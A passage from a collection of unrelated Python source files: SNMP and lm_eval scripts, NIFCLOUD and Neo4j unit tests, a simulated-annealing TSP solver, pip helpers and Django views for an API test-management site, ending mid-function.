      ((1,3,6,1,4,1,1), None) ),
    cbFun
)

# Run I/O dispatcher which would send pending queries and process responses
snmpEngine.transportDispatcher.runDispatcher()
|
from lm_eval import tasks
from pytablewriter import MarkdownTableWriter
# Markdown table: one row per registered task, with split checkmarks.
writer = MarkdownTableWriter()
writer.headers = ["Task Name", "Train", "Val", "Test", "Metrics"]
values = []
def chk(tf):
    """Render a truthy value as a checkmark and a falsy one as a space."""
    return '✓' if tf else ' '
# Instantiate every registered task and record which document splits it
# provides plus the names of its aggregation metrics; then dump the table.
for tname, Task in tasks.TASK_REGISTRY.items():
    task = Task()
    values.append([tname,chk(task.has_training_docs()),chk(task.has_validation_docs()),chk(task.has_test_docs()),', '.join(task.aggregation().keys())])
writer.value_matrix = values
print(writer.dumps())
from wataru.commands.models.base import CommandBase
from wataru.logging import getLogger
import code
logger = getLogger(__name__)
class Console(CommandBase):
    """Command that drops the user into an interactive Python REPL."""

    def apply_arguments(self, parser):
        # Optional path to a configuration file.
        parser.add_argument('--config-path', action='store',
                            dest='configpath', default='')

    def execute(self, namespace):
        # Open an interactive interpreter with this module's globals.
        code.interact(local=globals())
|
from botocore.model import ServiceModel
from nifcloud import serialize
class TestRdbSerializer(object):
    """Unit tests for ``serialize.RdbSerializer`` request serialization."""

    # Service-model metadata shared by every per-test model definition.
    rdb_model_metadata = {
        "apiVersion": "2013-05-15N2013-12-16",
        "endpointPrefix": "rdb",
        "protocol": "rdb",
        "serviceAbbreviation": "rdb",
        "serviceFullName": "NIFCLOUD RDB",
        "serviceId": "rdb",
        "signatureVersion": "v4",
        "uid": "rdb-2013-05-15N2013-12-16"
    }

    def test_RdbSerializer(self):
        """A plain operation serializes params into a POST form body
        with Action and Version added."""
        rdb_model = {
            "metadata": self.rdb_model_metadata,
            "operations": {
                "RdbOperation": {
                    "http": {
                        "method": "POST",
                        "requestUri": "/"
                    },
                    "input": {
                        "shape": "RdbOperationRequest"
                    },
                    "name": "rdbOperation",
                    "output": {
                        "shape": "RdbOperationResult"
                    }
                }
            },
            "shapes": {
                "RdbOperationRequest": {
                    "members": {
                        "Parameter": {
                            "locationName": "Parameter",
                            "shape": "String"
                        }
                    },
                    "name": "RdbOperationRequest",
                    "type": "structure"
                },
                "RdbOperationResult": {
                    "members": {
                        "Response": {
                            "locationName": "Response",
                            "shape": "String"
                        }
                    },
                    "name": "RdbOperationResult",
                    "type": "structure"
                },
                "String": {
                    "name": "String",
                    "type": "string"
                },
            }
        }
        rdb_service_model = ServiceModel(rdb_model)
        params = {
            "Parameter": "test"
        }
        rdb_serializer = serialize.RdbSerializer()
        res = rdb_serializer.serialize_to_request(
            params, rdb_service_model.operation_model("RdbOperation"))
        assert res["body"] == {"Action": "RdbOperation", "Parameter": "test", "Version": "2013-05-15N2013-12-16"}
        assert res["headers"] == {"Content-Type": "application/x-www-form-urlencoded; charset=utf-8"}
        assert res["method"] == "POST"
        assert res["query_string"] == ""
        assert res["url_path"] == "/"

    def test_RdbSerializer_fix_get_metrics_statistics_params(self):
        """NiftyGetMetricStatistics with empty params serializes to just
        Action and Version (no MetricName/Dimensions emitted)."""
        rdb_model = {
            "metadata": self.rdb_model_metadata,
            "operations": {
                "NiftyGetMetricStatistics": {
                    "http": {
                        "method": "POST",
                        "requestUri": "/"
                    },
                    "input": {
                        "shape": "NiftyGetMetricStatisticsRequest"
                    },
                    "name": "NiftyGetMetricStatistics",
                    "output": {
                        "resultWrapper": "RdbOperationResult",
                        "shape": "RdbOperationResult"
                    }
                },
            },
            "shapes": {
                "NiftyGetMetricStatisticsRequest": {
                    "members": {
                        "Dimensions": {
                            "locationName": "Dimensions",
                            "shape": "ListOfRequestDimensions"
                        },
                        "EndTime": {
                            "locationName": "EndTime",
                            "shape": "TStamp"
                        },
                        "MetricName": {
                            "locationName": "MetricName",
                            "shape": "String"
                        },
                        "StartTime": {
                            "locationName": "StartTime",
                            "shape": "TStamp"
                        }
                    },
                    "name": "NiftyGetMetricStatisticsRequest",
                    "type": "structure"
                },
                "ListOfRequestDimensions": {
                    "member": {
                        "locationName": "member",
                        "shape": "RequestDimensions"
                    },
                    "name": "ListOfRequestDimensions",
                    "type": "list"
                },
                "RequestDimensions": {
                    "members": {
                        "Name": {
                            "locationName": "Name",
                            "shape": "String"
                        },
                        "Value": {
                            "locationName": "Value",
                            "shape": "String"
                        }
                    },
                    "name": "RequestDimensions",
                    "required": [
                        "Name",
                        "Value"
                    ],
                    "type": "structure"
                },
                "RdbOperationResult": {
                    "members": {
                        "Response": {
                            "locationName": "Response",
                            "shape": "String"
                        }
                    },
                    "name": "RdbOperationResult",
                    "type": "structure"
                },
                "String": {
                    "name": "String",
                    "type": "string"
                },
                "TStamp": {
                    "name": "TStamp",
                    "type": "timestamp"
                }
            }
        }
        rdb_service_model = ServiceModel(rdb_model)
        params = {}
        rdb_serializer = serialize.RdbSerializer()
        res = rdb_serializer.serialize_to_request(
            params, rdb_service_model.operation_model("NiftyGetMetricStatistics"))
        assert res["body"] == {
            "Action": "NiftyGetMetricStatistics",
            "Version": "2013-05-15N2013-12-16"
        }
        assert res["headers"] == {"Content-Type": "application/x-www-form-urlencoded; charset=utf-8"}
        assert res["method"] == "POST"
        assert res["query_string"] == ""
        assert res["url_path"] == "/"

    def test_RdbSerializer_fix_get_metrics_statistics_params_MetricName_Dimensions(self):
        """Dimensions list members are flattened into the
        ``Dimensions.member.N.*`` form-encoded keys."""
        rdb_model = {
            "metadata": self.rdb_model_metadata,
            "operations": {
                "NiftyGetMetricStatistics": {
                    "http": {
                        "method": "POST",
                        "requestUri": "/"
                    },
                    "input": {
                        "shape": "NiftyGetMetricStatisticsRequest"
                    },
                    "name": "NiftyGetMetricStatistics",
                    "output": {
                        "resultWrapper": "RdbOperationResult",
                        "shape": "RdbOperationResult"
                    }
                },
            },
            "shapes": {
                "NiftyGetMetricStatisticsRequest": {
                    "members": {
                        "Dimensions": {
                            "locationName": "Dimensions",
                            "shape": "ListOfRequestDimensions"
                        },
                        "EndTime": {
                            "locationName": "EndTime",
                            "shape": "TStamp"
                        },
                        "MetricName": {
                            "locationName": "MetricName",
                            "shape": "String"
                        },
                        "StartTime": {
                            "locationName": "StartTime",
                            "shape": "TStamp"
                        }
                    },
                    "name": "NiftyGetMetricStatisticsRequest",
                    "required": [
                        "MetricName",
                        "Dimensions"
                    ],
                    "type": "structure"
                },
                "ListOfRequestDimensions": {
                    "member": {
                        "locationName": "member",
                        "shape": "RequestDimensions"
                    },
                    "name": "ListOfRequestDimensions",
                    "type": "list"
                },
                "RequestDimensions": {
                    "members": {
                        "Name": {
                            "locationName": "Name",
                            "shape": "String"
                        },
                        "Value": {
                            "locationName": "Value",
                            "shape": "String"
                        }
                    },
                    "name": "RequestDimensions",
                    "required": [
                        "Name",
                        "Value"
                    ],
                    "type": "structure"
                },
                "RdbOperationResult": {
                    "members": {
                        "Response": {
                            "locationName": "Response",
                            "shape": "String"
                        }
                    },
                    "name": "RdbOperationResult",
                    "type": "structure"
                },
                "String": {
                    "name": "String",
                    "type": "string"
                },
                "TStamp": {
                    "name": "TStamp",
                    "type": "timestamp"
                }
            }
        }
        rdb_service_model = ServiceModel(rdb_model)
        params = {
            "MetricName": "test_metric_name",
            "Dimensions": [
                {"Name": "test_dimensions_name", "Value": "test_value"}
            ]
        }
        rdb_serializer = serialize.RdbSerializer()
        res = rdb_serializer.serialize_to_request(
            params, rdb_service_model.operation_model("NiftyGetMetricStatistics"))
        assert res["body"] == {
            "Action": "NiftyGetMetricStatistics",
            "MetricName": "test_metric_name",
            "Version": "2013-05-15N2013-12-16",
            "Dimensions.member.1.Name": "test_dimensions_name",
            "Dimensions.member.1.Value": "test_value"
        }
        assert res["headers"] == {"Content-Type": "application/x-www-form-urlencoded; charset=utf-8"}
        assert res["method"] == "POST"
        assert res["query_string"] == ""
        assert res["url_path"] == "/"
|
import numpy as np
import random
import networkx as nx
import more_itertools
import matplotlib.pyplot as plt
import geopy.distance as geodesic_dist
from models.distance import get_dist_func
import argparse
def get_fitness(solution_edgelist):
    """
    Compute fitness value for solution given by edge list.

    The fitness is the total length of the tour: the module-level
    ``dist_func`` applied to every edge, summed.

    Args:
        solution_edgelist (list): List of edges representing the solution.

    Returns:
        (float): Computed fitness value.
    """
    total = 0
    for edge in solution_edgelist:
        total += dist_func(*edge)
    return total
def initial_solution(network, strategy):
    """
    Compute initial solution for the TSP problem using specified strategy.

    Args:
        network (object): Networkx representation of the network.
        strategy (str): Method used to construct the initial solution.
            Valid values are 'greedy' and 'random'.
            NOTE(review): any other value leaves ``dst`` unbound and
            raises NameError on the first iteration -- confirm callers
            only pass these two values.

    Returns:
        (tuple): Edge list representing the initial solution and the fitness value
        of the initial solution.
    """
    # Start with random node.
    starting_node = random.choice(list(network.nodes()))

    # Initialize list for the solution edge list.
    solution_edgelist = []

    # Initialize set for nodes not yet part of path.
    nodes_free = set(np.array(network.nodes()))

    # Set starting node as first node and remove from free nodes.
    src = starting_node
    nodes_free.remove(src)

    # While there are nodes not yet part of path, create path.
    while len(nodes_free) > 0:
        # If doing greedy search, connect to closest node. Else connect to
        # random node.
        if strategy == 'greedy':
            dst = min(nodes_free, key=lambda x: dist_func(src, x))
        elif strategy == 'random':
            dst = random.choice(list(nodes_free))
        # Append to solution edge list, remove node from set of free nodes
        # and make curent last node in path the next source node.
        solution_edgelist.append([src, dst])
        nodes_free.remove(dst)
        src = dst

    # Append edge for path from last node back to starting node (close tour).
    solution_edgelist.append([src, starting_node])

    # Compute fitness for initial configuration.
    fitness = get_fitness(solution_edgelist)

    # Return initial solution as edge list and the fitness of the current
    # solution.
    return solution_edgelist, fitness
def anneal(network, max_it=1e4, temp=-1.0, temp_min=1.0e-8, alpha=0.995):
    """
    Approximate solution to TSP problem on given network using simulated annealing.

    The neighbour move reverses a randomly chosen contiguous segment of
    the current tour permutation; rejected moves are undone by reversing
    the same segment again.

    Args:
        network (object): Networkx representation of the network
        max_it (int): Maximum iterations to perform
        temp (float): Initial temperature; -1.0 means use
            sqrt(number of nodes) as the starting temperature
        temp_min (float): Minimum temperature. The procedure is stopped when the
            temperature falls below this value
        alpha (float): The cooling rate (multiplicative, per iteration)

    Returns:
        (tuple): The edgelist encoding the solution, the current fitness value, the best found fitness value,
        the initial fitness value, the list of accepted edgelists (for animations), the list of temperature values
        for each iteration, the list of fitness values for each iteration
    """
    # Set starting temperature, stopping temperature, alpha, maximum iterations
    # and initialize iterations counter.
    curr_temp = np.sqrt(network.number_of_nodes()) if temp == -1.0 else temp
    it_count = 0

    # Get initial solution (note: 'random' strategy, despite the greedy comment
    # elsewhere) and derive the node permutation from its edge list.
    solution_edgelist, initial_fitness = initial_solution(network, strategy='random')
    solution_perm = np.array([el[0] for el in solution_edgelist])
    solution_length = len(solution_perm)

    # Set current fitness and best fitness.
    current_fitness = initial_fitness
    best_fitness = initial_fitness

    # List for storing all accepted states (for animating).
    accepted_edgelists = []

    # Lists for storing next temperature and next fitness value.
    temp_vals = []
    fitness_vals = []

    # Perform annealing while temperature above minimum and
    # maximum number of iterations not achieved.
    while curr_temp > temp_min and it_count < max_it:
        # Append temperature and fitness value
        temp_vals.append(curr_temp)
        fitness_vals.append(current_fitness)

        # Generate neighbor state: reverse a random segment of length rnd1
        # starting at index rnd2.
        rnd1 = random.randint(2, solution_length)
        rnd2 = random.randint(1, solution_length - rnd1 + 1)
        solution_perm[rnd2 : (rnd2 + rnd1)] = np.array(list(reversed(solution_perm[rnd2 : (rnd2 + rnd1)])))

        # Evaluate neighbor: rebuild the closed tour's edge list.
        neighbor_edgelist = list(more_itertools.pairwise(np.hstack((solution_perm, solution_perm[0]))))
        neighbor_fitness = get_fitness(neighbor_edgelist)

        # If neighbor fitness is better, accept. If neighbor fitness worse,
        # accept with probability dependent on fitness difference and current temperature.
        if neighbor_fitness <= current_fitness:
            current_fitness = neighbor_fitness
            solution_edgelist = neighbor_edgelist
            accepted_edgelists.append(solution_edgelist)
            if neighbor_fitness < best_fitness:
                best_fitness = neighbor_fitness
        else:
            # Compute probability of accepting worse state (Metropolis rule).
            p_accept = np.exp(-np.abs(neighbor_fitness - current_fitness)/curr_temp)
            if random.random() < p_accept:
                current_fitness = neighbor_fitness
                solution_edgelist = neighbor_edgelist
                accepted_edgelists.append(solution_edgelist)
            else:
                # Undo permutation if not accepted.
                solution_perm[rnd2 : (rnd2 + rnd1)] = np.array(list(reversed(solution_perm[rnd2 : (rnd2 + rnd1)])))

        # Increment iteration counter and decrease temperature.
        it_count += 1
        curr_temp *= alpha
        # Progress report every iteration.
        print("current fitness: {0}".format(current_fitness))
        print("current iteration: {0}/{1}".format(it_count, max_it))

    return solution_edgelist, current_fitness, best_fitness, initial_fitness, accepted_edgelists, temp_vals, fitness_vals
if __name__ == '__main__':
    ### PARSE ARGUMENTS ###
    parser = argparse.ArgumentParser(description='Approximate solution to TSP using simulated annealing.')
    parser.add_argument('--num-nodes', type=int, default=30, help='Number of nodes to use')
    parser.add_argument('--dist-func', type=str, default='geodesic', choices=['geodesic', 'learned'],
            help='Distance function to use')
    parser.add_argument('--prediction-model', type=str, default='gboosting', choices=['gboosting', 'rf'],
            help='Prediction model to use for learned distance function')
    parser.add_argument('--max-it', type=int, default=1e4, help='Maximum iterations to perform')
    parser.add_argument('--temp', type=float, default=-1.0, help='Initial temperature')
    parser.add_argument('--temp-min', type=float, default=1.0e-8, help='Minimal temperature')
    parser.add_argument('--alpha', type=float, default=0.995, help='Cooling rate')
    args = parser.parse_args()
    #######################

    # Parse problem network.
    network = nx.read_gpickle('./data/grid_data/grid_network.gpickle')

    # Number of nodes to remove from network.
    to_remove = network.number_of_nodes() - args.num_nodes

    # Remove randomly sampled nodes to get specified number of nodes.
    network.remove_nodes_from(random.sample(list(network.nodes), to_remove))

    # Get distance function (module-level global used by get_fitness and
    # initial_solution).
    dist_func = get_dist_func(network, which=args.dist_func, prediction_model=args.prediction_model)

    # Get solution using simulated annealing.
    solution_edgelist, current_fitness, best_fitness, initial_fitness, \
            accepted_edgelists, temp_vals, fitness_vals = anneal(network, max_it=args.max_it,
                    temp=args.temp, temp_min=args.temp_min, alpha=args.alpha)

    # Save list of edge lists for animation.
    np.save('./results/edgelists/edgelist_tsp_sa.npy', list(map(np.vstack, accepted_edgelists)))
    nx.write_gpickle(network, './results/networks/network_tsp_sa.gpickle')

    # Plot temperature and fitness with respect to iteration.
    plt.plot(temp_vals)
    plt.xlabel('Iteration')
    plt.ylabel('Temperature')
    plt.savefig('./results/plots/temperature_tsp_sa.png')
    plt.clf()
    plt.plot(fitness_vals)
    plt.xlabel('Iteration')
    plt.ylabel('Fitness')
    plt.savefig('./results/plots/fitness_tsp_sa.png')

    # Print best solution fitness.
    print('Fitness of best found solution: {0:.3f}'.format(best_fitness))

    # Print initial best fitness.
    print('Fitness of initial solution: {0:.3f}'.format(initial_fitness))

    # Print increase in fitness.
    # NOTE(review): this prints the ratio 100*initial/best, not the
    # improvement percentage 100*(initial-best)/initial -- confirm intent.
    print('Fitness value improved by: {0:.3f}%'.format(100*initial_fitness/best_fitness))
|
"""
@file
@brief Helpers for pip
Some links to look:
* `installing_python_packages_programatically.py <https://gist.github.com/rwilcox/755524>`_
* `Calling pip programmatically <http://blog.ducky.io/python/2013/08/22/calling-pip-programmatically/>`_
"""
class PQPipError(Exception):
    """
    Exception raised by the pip helper functions in this module.
    """

    def __init__(self, *args):
        """
        @param args either a single message string, or 3 strings (cmd, out, err)
        """
        if len(args) != 1:
            cmd, out, err = args
            text = "CMD:\n{0}\nOUT:\n{1}\n[piperror]\n{2}".format(cmd, out, err)
            Exception.__init__(self, text)
        else:
            Exception.__init__(self, args[0])  # pragma: no cover
def get_packages_list():
    """
    calls ``pip list`` to retrieve the list of packages
    (via pip's internal API -- NOTE(review):
    ``get_installed_distributions`` was removed from recent pip
    releases; this may need migrating to ``importlib.metadata``)
    """
    from pip._internal.utils.misc import get_installed_distributions
    return get_installed_distributions(local_only=True)
def package2dict(pkg):
    """
    Extracts information from a package.

    @param pkg type *pip._vendor.pkg_resources.Distribution*
    @return dictionary with keys version, project_name, py_version,
        requires, platform, extras, location
    """
    fields = ("version", "project_name", "py_version", "requires",
              "platform", "extras", "location")
    return {field: getattr(pkg, field) for field in fields}
def get_package_info(name=None, start=0, end=-1):
    """
    Calls ``pip show`` to retrieve information about packages.

    @param name name of the package or None to get all of them in a list
    @param start start at package n (in list return by @see fn get_packages_list)
    @param end end at package n, -1 for all
    @return dictionary or list of dictionaries
    @raise PQPipError if no package falls in [start, end) or a name
        lookup does not return exactly one result
    """
    from pip._internal.commands.show import search_packages_info
    if name is None:
        # No name: walk the installed packages and recurse per package.
        res = []
        packs = get_packages_list()
        if end == -1:
            end = len(packs)  # pragma: no cover
        subp = packs[start:end]
        if len(subp) == 0:
            raise PQPipError(  # pragma: no cover
                "No package, start={0}, end={1}, len(subp)={2}, len(packs)={3}".format(
                    start, end, len(subp), len(packs)))
        for cp in subp:
            pack = cp.project_name
            info = get_package_info(pack)
            res.append(info)
        if len(res) == 0 and len(subp) > 0:
            # BUG FIX: the format string previously referenced field {3}
            # with only three arguments, so raising this error raised an
            # IndexError instead of the intended PQPipError.
            raise PQPipError(  # pragma: no cover
                "Empty list, unexpected, start={0}, end={1}, len(subp)={2}".format(
                    start, end, len(subp)))
        return res
    res = list(search_packages_info([name]))
    if len(res) != 1:
        raise PQPipError(  # pragma: no cover
            "Unexpected number of results {0} for {1}".format(
                len(res), name))
    return res[0]
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) "Neo4j"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from neo4j.data import DataHydrator
from neo4j.packstream import Structure
# python -m pytest -s -v tests/unit/test_data.py
def test_can_hydrate_node_structure():
    # A packstream b'N' structure hydrates into a node object.
    hydrator = DataHydrator()
    node_struct = Structure(b'N', 123, ["Person"], {"name": "Alice"})
    node, = hydrator.hydrate([node_struct])
    assert node.id == 123
    assert node.labels == {"Person"}
    assert set(node.keys()) == {"name"}
    assert node.get("name") == "Alice"
def test_hydrating_unknown_structure_returns_same():
    # Structures with an unknown tag must pass through hydration unchanged.
    hydrator = DataHydrator()
    unknown = Structure(b'?', "foo")
    result, = hydrator.hydrate([unknown])
    assert result == unknown
def test_can_hydrate_in_list():
    # Node structures nested inside a list are hydrated in place.
    hydrator = DataHydrator()
    node_struct = Structure(b'N', 123, ["Person"], {"name": "Alice"})
    hydrated, = hydrator.hydrate([[node_struct]])
    assert isinstance(hydrated, list)
    node, = hydrated
    assert node.id == 123
    assert node.labels == {"Person"}
    assert set(node.keys()) == {"name"}
    assert node.get("name") == "Alice"
def test_can_hydrate_in_dict():
    # Node structures nested inside a dict value are hydrated in place.
    hydrator = DataHydrator()
    node_struct = Structure(b'N', 123, ["Person"], {"name": "Alice"})
    hydrated, = hydrator.hydrate([{"foo": node_struct}])
    assert isinstance(hydrated, dict)
    node = hydrated["foo"]
    assert node.id == 123
    assert node.labels == {"Person"}
    assert set(node.keys()) == {"name"}
    assert node.get("name") == "Alice"
|
from django.contrib.auth.hashers import make_password, check_password
from django.core.paginator import Paginator
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render, redirect
from django.urls import reverse
from api.models import ATUser, Product, Apis, Apitest, Apistep, Bug, Set, Apptest, Appteststep, Webtest, Webteststep
import os
from djcelery.models import PeriodicTask, CrontabSchedule, IntervalSchedule
from api.tasks import ApiTask
def index(request):
    """Trivial index view returning a plain-text marker."""
    return HttpResponse('index')
# Login
def login(request):
    """Render the login form (GET) or authenticate a user (POST)."""
    if request.method == "GET":
        return render(request, 'login.html', context={'title': '登陆'})
    elif request.method == "POST":
        username = request.POST.get("username")
        password = request.POST.get("password")
        candidates = ATUser.objects.filter(u_username=username)
        if candidates.exists():
            user = candidates.first()
            if check_password(password, user.u_password):
                # Remember the logged-in user in the session.
                request.session['user_id'] = user.id
                return redirect(reverse("at:home"))
            else:
                # Wrong password: back to the login form.
                return redirect(reverse("at:login"))
    # Unknown user or unsupported method: back to the login form.
    return redirect(reverse("at:login"))
# Register
def register(request):
    """Render the registration form (GET) or create a new user (POST)."""
    if request.method == 'GET':
        return render(request, 'register.html', context={'title': '注册'})
    elif request.method == 'POST':
        username = request.POST.get('username')
        password = request.POST.get('password')
        duplicates = ATUser.objects.filter(u_username=username)
        if username == "" or duplicates.exists():
            # Empty or already-taken user name: back to the form.
            return redirect(reverse('at:register'))
        else:
            # Store only the hashed password.
            user = ATUser()
            user.u_username = username
            user.u_password = make_password(password)
            user.save()
            return redirect(reverse('at:login'))
    return redirect(reverse('at:register'))
# Home page
def home(request):
    """Render the home page, showing the logged-in user's name if any."""
    context = {
        'title': '首页',
        'username': 'username'
    }
    user_id = request.session.get('user_id')
    if user_id:
        context['username'] = ATUser.objects.get(id=user_id).u_username
    return render(request, 'home.html', context=context)
# Logout
def logout(request):
    """Clear the whole session and return to the login page."""
    request.session.flush()
    return redirect(reverse('at:login'))
# Product center
def product_manage(request):
    """List all products, paginated 10 per page (``?page=N``)."""
    page_number = request.GET.get('page', 1)
    page_object = Paginator(Product.objects.all(), 10).page(page_number)
    return render(request, 'product_manage.html',
                  context={'title': '产品中心', 'products': page_object})
# 添加产品
def add_product(request):
    """GET: render the add-product form. POST: create a product.

    Rejects an empty or duplicate product name by bouncing back to the form.
    """
    if request.method == 'GET':
        return render(request, 'add_product.html', context={'title': '添加产品'})
    elif request.method == 'POST':
        product_name = request.POST.get('product_name')
        duplicate = Product.objects.filter(p_product_name=product_name).exists()
        if product_name == "" or duplicate:
            return redirect(reverse('at:add_product'))
        Product(
            p_product_name=product_name,
            p_product_desc=request.POST.get('product_desc'),
            p_product_er=request.POST.get('product_er'),
        ).save()
        return redirect(reverse('at:product_manage'))
    return redirect(reverse('at:add_product'))
# 编辑产品
def update_product(request):
    """GET: render the edit form for one product. POST: persist the edits.

    An empty product name re-renders the form; otherwise the row is updated
    and the browser is sent back to the product list.
    """
    p_id = request.GET.get('product.id')
    context = {
        'title': '修改产品',
        'product': Product.objects.filter(id=p_id).first(),
    }
    if request.method == "POST":
        new_name = request.POST.get('product_name')
        if new_name == "":
            return render(request, 'update_product.html', context=context)
        Product.objects.filter(id=p_id).update(
            p_product_name=new_name,
            p_product_desc=request.POST.get('product_desc'),
            p_product_er=request.POST.get('product_er'),
        )
        return redirect(reverse('at:product_manage'))
    return render(request, 'update_product.html', context=context)
# 删除产品
def product_delete(request):
    """Delete one product; respond '1' on success, '2' on failure.

    The '1'/'2' response codes are kept because the front-end JS matches them.
    Fix: the bare ``except:`` swallowed *every* error; now only "row missing"
    and "malformed id" map to '2', anything else surfaces normally.
    """
    product_id = request.GET['product_id']
    try:
        Product.objects.get(id=product_id).delete()
        return HttpResponse('1')
    except (Product.DoesNotExist, ValueError):
        return HttpResponse('2')
# 单接口管理
def apis_manage(request):
    """Paginated list of single-interface test cases."""
    page_number = request.GET.get('page', 1)
    apis_page = Paginator(Apis.objects.all(), 10).page(page_number)
    context = {
        'title': '接口用例管理',
        'apis_list': apis_page,
    }
    return render(request, 'apis_manage.html', context=context)
# 添加单接口
def add_apis(request):
    """GET: render the new-api form. POST: create a case.

    Rejects an empty or duplicate case name by bouncing back to the form.
    """
    if request.method == 'GET':
        context = {
            'title': '添加接口用例',
            'pro_names': Product.objects.all(),
        }
        return render(request, 'add_apis.html', context=context)
    elif request.method == 'POST':
        api_name = request.POST.get('api_name')
        duplicate = Apis.objects.filter(api_name=api_name).exists()
        if api_name == "" or duplicate:
            return redirect(reverse('at:add_apis'))
        Apis(
            api_name=api_name,
            api_url=request.POST.get('api_url'),
            api_param_value=request.POST.get('api_param_value'),
            api_method=request.POST.get('method_check'),
            api_result=request.POST.get('api_result'),
            api_status=request.POST.get('api_status'),
            api_pro_id=request.POST.get('dropdown'),
        ).save()
        return redirect(reverse('at:apis_manage'))
    return redirect(reverse('at:add_apis'))
# 编辑接口
def apis_update(request):
    """GET: render the edit form for one api case. POST: persist the edits."""
    apis_id = request.GET.get("apis.id")
    context = {
        'title': '编辑接口用例',
        'apis': Apis.objects.filter(id=apis_id).first(),
        'pro_names': Product.objects.all(),
    }
    if request.method == "POST":
        api_name = request.POST.get('api_name')
        if api_name == "":
            return redirect(reverse('at:apis_update'))
        Apis.objects.filter(id=apis_id).update(
            api_name=api_name,
            api_url=request.POST.get('api_url'),
            api_param_value=request.POST.get('api_param_value'),
            api_method=request.POST.get('method_check'),
            api_result=request.POST.get('api_result'),
            api_status=request.POST.get('api_status'),
            api_pro_id=request.POST.get('dropdown'),
        )
        return redirect(reverse("at:apis_manage"))
    return render(request, 'apis_update.html', context=context)
# 删除接口
def apis_delete(request):
    """Delete one api case; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    apis_id = request.GET['apis_id']
    try:
        Apis.objects.get(id=apis_id).delete()
        return HttpResponse('1')
    except (Apis.DoesNotExist, ValueError):
        return HttpResponse('2')
# 流程接口管理
def api_test_manage(request):
    """Paginated list of flow (multi-step) test cases."""
    page_number = request.GET.get('page', 1)
    tests_page = Paginator(Apitest.objects.all(), 10).page(page_number)
    context = {
        'title': '流程用例管理',
        'api_test': tests_page,
    }
    return render(request, 'api_test_manage.html', context=context)
# 添加流程接口
def add_api_test(request):
    """GET: render the new flow-case form. POST: create the case.

    Rejects an empty or duplicate case name by bouncing back to the form.
    """
    if request.method == "GET":
        context = {
            'title': '添加接口用例',
            'pro_names': Product.objects.all(),
        }
        return render(request, 'add_api_test.html', context=context)
    elif request.method == "POST":
        api_t_name = request.POST.get('api_t_name')
        duplicate = Apitest.objects.filter(api_t_name=api_t_name).exists()
        if api_t_name == "" or duplicate:
            return redirect(reverse('at:add_api_test'))
        Apitest(
            api_t_name=api_t_name,
            api_t_desc=request.POST.get('api_t_desc'),
            api_ter=request.POST.get('api_ter'),
            api_t_res=request.POST.get('api_status'),
            api_t_pro_id=request.POST.get('dropdown'),
        ).save()
        return redirect(reverse('at:api_test_manage'))
    return redirect(reverse('at:add_api_test'))
# 删除接口
def api_delete(request):
    """Delete one flow case; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    api_id = request.GET['api_id']
    try:
        Apitest.objects.get(id=api_id).delete()
        return HttpResponse('1')
    except (Apitest.DoesNotExist, ValueError):
        return HttpResponse('2')
# 编辑接口
def api_update(request):
    """GET: render the flow-case edit form. POST: persist the edits."""
    api_id = request.GET.get("api_t.id")
    context = {
        'title': '编辑接口用例',
        'api_t': Apitest.objects.filter(id=api_id).first(),
        'pro_names': Product.objects.all(),
    }
    if request.method == "POST":
        api_t_name = request.POST.get('api_t_name')
        if api_t_name == "":
            return redirect(reverse('at:api_update'))
        Apitest.objects.filter(id=api_id).update(
            api_t_name=api_t_name,
            api_t_desc=request.POST.get('api_t_desc'),
            api_ter=request.POST.get('api_ter'),
            api_t_res=request.POST.get('api_status'),
            api_t_pro_id=request.POST.get('dropdown'),
        )
        return redirect(reverse("at:api_test_manage"))
    return render(request, 'api_update.html', context=context)
# 流程接口步骤管理
def api_step_manage(request):
    """Step overview for the flow case selected via the `api_t.id` query param."""
    api_test = Apitest.objects.get(id=request.GET.get('api_t.id'))
    context = {
        'title': '接口用例步骤管理',
        # NOTE(review): all steps are passed, not just this case's —
        # presumably the template filters by case; confirm.
        'api_steps': Apistep.objects.all(),
        'api_test': api_test,
    }
    return render(request, 'api_step_manage.html', context=context)
# 添加流程接口步骤
def add_api_step(request):
    """GET: render the new-step form. POST: create a step for the chosen case."""
    if request.method == "GET":
        context = {
            'title': '添加接口用例步骤',
            'api_tests': Apitest.objects.all(),
        }
        return render(request, 'add_api_step.html', context=context)
    elif request.method == "POST":
        api_name = request.POST.get('api_name')
        if api_name == "":
            return redirect(reverse('at:add_api_step'))
        Apistep(
            api_name=api_name,
            api_step=request.POST.get('api_step'),
            api_url=request.POST.get('api_url'),
            api_param_value=request.POST.get('api_param_value'),
            api_method=request.POST.get('method_check'),
            api_result=request.POST.get('api_result'),
            api_status=request.POST.get('api_status'),
            api_test_id=request.POST.get('dropdown'),
        ).save()
        return redirect(reverse('at:api_test_manage'))
    return redirect(reverse('at:add_api_step'))
# 删除接口步骤
def api_step_delete(request):
    """Delete one step; respond '1' on success, '2' on failure.

    Fix: narrow the former bare ``except:`` to missing-row / bad-id only.
    """
    api_step_id = request.GET['api_step_id']
    try:
        Apistep.objects.get(id=api_step_id).delete()
        return HttpResponse('1')
    except (Apistep.DoesNotExist, ValueError):
        return HttpResponse('2')
# 编辑接口步骤
def api_step_update(request):
    """GET: render the step edit form. POST: persist the edits."""
    api_step_id = request.GET.get("api_step.id")
    context = {
        'title': '编辑接口用例',
        'api_step': Apistep.objects.filter(id=api_step_id).first(),
        'api_tests': Apitest.objects.all(),
    }
    if request.method == "POST":
        api_name = request.POST.get('api_name')
        if api_name == "":
            return redirect(reverse('at:api_step_update'))
        Apistep.objects.filter(id=api_step_id).update(
            api_name=api_name,
            api_step=request.POST.get('api_step'),
            api_url=request.POST.get('api_url'),
            api_param_value=request.POST.get('api_param_value'),
            api_method=request.POST.get('method_check'),
            api_result=request.POST.get('api_result'),
            api_status=request.POST.get('api_status'),
            api_test_id=request.POST.get('dropdown'),
        )
